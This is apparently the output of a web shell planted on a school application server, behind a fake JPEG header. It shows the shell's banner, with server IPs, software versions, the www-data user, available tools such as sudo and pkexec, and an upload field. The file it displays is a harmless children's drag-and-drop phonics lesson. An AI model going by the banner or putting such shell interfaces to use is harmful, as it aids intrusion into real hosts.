????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.223.168.194 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old2/Html/LevelA/Category1/ |
Upload File : |
<!doctype html> <html> <head> <title>anWordsPage</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <style> table { border: 0px solid; } .cls_letterPAN, .cls_letterVAN, .cls_letterCAN, .cls_letterFAN, .cls_letterMAN { color: #0F23DB; font-size: 30px; font-family: 'Arial Rounded MT Bold'; } #id_dropBox_letterPAN, #id_dropBox_letterVAN, #id_dropBox_letterCAN, #id_dropBox_letterFAN, #id_dropBox_letterMAN { color: red; font-size: 30px; font-family: 'Arial Rounded MT Bold'; } </style> <script> function page_preLoad() { setPageImages(); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.A, Category.No1, 3), true, true); shared_setFooterTable('id_tblFooter', true, true, false, true, true); } function page_onLoad() { shared_set_debugInfo(Level.A, Category.No1); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); } function setPageImages() { var imagePath = '../../../img/LevelA/Category1/LevelACat1Lesson3/'; shared_setImageSource('id_img_anTable', imagePath, 'anTable.png'); shared_setImageSource('id_img_man_black', imagePath, 'man_black.png'); shared_setImageSource('id_img_fan_black', imagePath, 'fan_black.png'); shared_setImageSource('id_img_pan', imagePath, 'pan.png'); shared_setImageSource('id_img_can_color', imagePath, 'can_color.png'); shared_setImageSource('id_img_van', imagePath, 'van.png'); } function btnPrevious_click() { window.location = "LevelACat1Lesson2.html"; } function btnNext_click() { window.location = "LevelACat1Lesson4.html"; } function btnHome_click() { shared_btnHomeCategories_click('LevelA'); } function DragDrop(id_dropBox) { shared_setTextAndBackgroundColorToGreenByTrimmingText(shared_currentDropingId, id_dropBox); isAllInfosMovedShowClapsAnimation(); } function isAllInfosMovedShowClapsAnimation() { var allElementIdsArray = ['id_letterPAN', 'id_letterVAN', 'id_letterCAN', 'id_letterFAN', 'id_letterMAN']; shared_is_all_infos_moved_show_claps_animation(allElementIdsArray, 'shared_id_div_claps_image'); } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="5%"> <td> <header height="100%"> <div id="id_tblHeader" align="center"></div> </header> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none"> <tr height="35%"> <td align="center" style="border-bottom:none"> <table width="100%" height="100%" cellspacing="0" cellpadding="0"> <tr height="10"> <td class="shared_style_text1"> <span><u>Learn to read and write the following words:</u></span> </td> </tr> <tr height="*" align="center"> <td> <img id="id_img_anTable" width="70%" height="50%" alt=""/> </td> </tr> </table> </td> </tr> <tr height="*"> <td align="center"> <table width="100%" height="100%" cellspacing="0" cellpadding="0"> <tr height="15%"> <td class="shared_style_text1"><span><u>Name the following pictures:</u></span></td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="33%"> <td width="50%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="50%" align="right" valign="middle"> <img id="id_img_man_black" width="60%" height="90%" alt=""/> </td> <td width="*"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="30%"> <td width="60%"> </td> <td width="*"> </td> </tr> <tr height="*"> <td id="id_dropBox_letterMAN" width="60%" align="center" valign="middle" ondrop="DragDrop('id_dropBox_letterMAN')" ondragover="shared_allowDrop(event)"> <span>___</span> </td> <td width="*"> </td> </tr> <tr height="30%"> <td width="60%"> </td> <td width="*"> </td> </tr> </table> </td> </tr> </table> </td> <td width="50%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="50%" align="right" valign="middle"> <img id="id_img_fan_black" width="50%" height="100%" alt=""/> </td> <td width="*"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="30%"> <td width="60%"> </td> <td width="*"> </td> </tr> <tr height="*"> <td id="id_dropBox_letterFAN" width="60%" align="center" valign="middle" ondrop="DragDrop('id_dropBox_letterFAN')" ondragover="shared_allowDrop(event)"> <span>___</span> </td> <td width="*"> </td> </tr> <tr height="30%"> <td width="60%"> </td> <td width="*"> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="33%"> <td width="50%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="50%" align="right" valign="middle"> <img id="id_img_pan" width="50%" height="90%" alt=""/> </td> <td width="*"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="30%"> <td width="60%"> </td> <td width="*"> </td> </tr> <tr height="*"> <td id="id_dropBox_letterPAN" width="60%" align="center" valign="middle" ondrop="DragDrop('id_dropBox_letterPAN')" ondragover="shared_allowDrop(event)"> <span>___</span> </td> <td width="*"> </td> </tr> <tr height="30%"> <td width="60%"> </td> <td width="*"> </td> </tr> </table> </td> </tr> </table> </td> <td width="50%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="50%" align="right" valign="middle"> <img id="id_img_can_color" width="40%" height="90%" alt=""/> </td> <td width="*"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="30%"> <td width="60%"> </td> <td width="*"> </td> </tr> <tr height="*"> <td id="id_dropBox_letterCAN" width="60%" align="center" valign="middle" ondrop="DragDrop('id_dropBox_letterCAN')" ondragover="shared_allowDrop(event)"> <span>___</span> </td> <td width="*"> </td> </tr> <tr height="30%"> <td width="60%"> </td> <td width="*"> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td width="50%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="30%"> <td width="*"> </td> <td width="30%"> </td> </tr> <tr height="*"> <td width="*"> </td> <td id="id_dropBox_letterVAN" width="30%" align="center" valign="middle" ondrop="DragDrop('id_dropBox_letterVAN')" ondragover="shared_allowDrop(event)"> <span>___</span> </td> </tr> <tr height="30%"> <td width="*"> </td> <td width="30%"> </td> </tr> </table> </td> <td width="*" align="left" valign="middle"> <img id="id_img_van" width="40%" height="60%" alt=""/> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="10%"> <td align="center" style="border-top: 0px"> <table id="id_tblSection3" width="100%" height="100%" cellspacing="0" cellpadding="0"> <tr height="100%"> <td class="shared_style_text1" width="*"><span><u>Options:</u></span></td> <td width="16%" align="center"> <span id="id_letterPAN" class="cls_letterPAN" draggable="true" ondragstart="shared_dragStart(event)">pan</span> </td> <td width="16%" align="center"> <span id="id_letterVAN" class="cls_letterVAN" draggable="true" ondragstart="shared_dragStart(event)">van</span> </td> <td width="16%" align="center"> <span id="id_letterCAN" class="cls_letterCAN" draggable="true" ondragstart="shared_dragStart(event)">can</span> </td> <td width="16%" align="center"> <span id="id_letterFAN" class="cls_letterFAN" draggable="true" ondragstart="shared_dragStart(event)">fan</span> </td> <td width="16%" align="center"> <span id="id_letterMAN" class="cls_letterMAN" draggable="true" ondragstart="shared_dragStart(event)">man</span> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="5%"> <td> <footer height="100%"> <div id="id_tblFooter" align="center"></div> </footer> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_letterPAN', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_letterPAN'}}); new webkit_draggable('id_letterVAN', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_letterVAN'}}); new webkit_draggable('id_letterCAN', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_letterCAN'}}); new webkit_draggable('id_letterFAN', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_letterFAN'}}); new webkit_draggable('id_letterMAN', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_letterMAN'}}); webkit_drop.add('id_dropBox_letterPAN', {accept : ["cls_letterPAN"], onDrop : function(){DragDrop('id_dropBox_letterPAN')}}); webkit_drop.add('id_dropBox_letterVAN', {accept : ["cls_letterVAN"], onDrop : function(){DragDrop('id_dropBox_letterVAN')}}); webkit_drop.add('id_dropBox_letterCAN', {accept : ["cls_letterCAN"], onDrop : function(){DragDrop('id_dropBox_letterCAN')}}); webkit_drop.add('id_dropBox_letterFAN', {accept : ["cls_letterFAN"], onDrop : function(){DragDrop('id_dropBox_letterFAN')}}); webkit_drop.add('id_dropBox_letterMAN', {accept : ["cls_letterMAN"], onDrop : function(){DragDrop('id_dropBox_letterMAN')}}); </script> </body> </html>